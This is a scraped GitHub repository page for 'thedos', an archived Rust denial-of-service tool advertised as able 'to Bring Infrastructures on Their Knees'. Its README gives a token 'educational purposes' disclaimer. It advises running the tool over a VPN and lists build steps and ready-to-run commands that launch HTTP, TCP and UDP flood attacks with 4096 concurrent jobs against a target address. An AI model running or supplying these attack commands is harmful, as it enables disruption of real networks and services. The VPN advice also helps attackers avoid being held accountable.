Skip to content
This repository has been archived by the owner on Sep 10, 2023. It is now read-only.
/ thedos Public archive

🚬 Asynchronouse, Multithreaded 🪡 and Blazingly Fast⚡TheDoS ☠ Tools🗜️to Bring Infrastructures on Their Knees

Notifications You must be signed in to change notification settings

wildonion/thedos

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

21 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🚨 Disclaimer

I AM NOT RESPONSIBLE FOR WHAT YOU WANT TO DO WITH THIS TOOL, THIS IS FOR EDUCATIONAL PURPOSES.

☠ TheDoS (The Developer of Sin)

Attack networks asynchronously by getting help of workers!

🚬 Usage

run it over VPN

default jobs are 4096

build using: cargo build --release

  • start http attack with 4096 jobs: ./thedos --http-addr http://example.app --jobs 4096

  • start tcp attack with 4096 jobs: ./thedos --tcp-addr 93.184.216.34:24535 --jobs 4096

  • start udp attack with 4096 jobs: ./thedos --udp-addr 93.184.216.34:24535 --jobs 4096

OR

  • start http attack with 4096 jobs: cargo run -- --http-addr http://example.app --jobs 4096

  • start tcp attack with 4096 jobs: cargo run -- --tcp-addr 93.184.216.34:24535 --jobs 4096

  • start udp attack with 4096 jobs: cargo run -- --udp-addr 93.184.216.34:24535 --jobs 4096

About

🚬 Asynchronouse, Multithreaded 🪡 and Blazingly Fast⚡TheDoS ☠ Tools🗜️to Bring Infrastructures on Their Knees

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages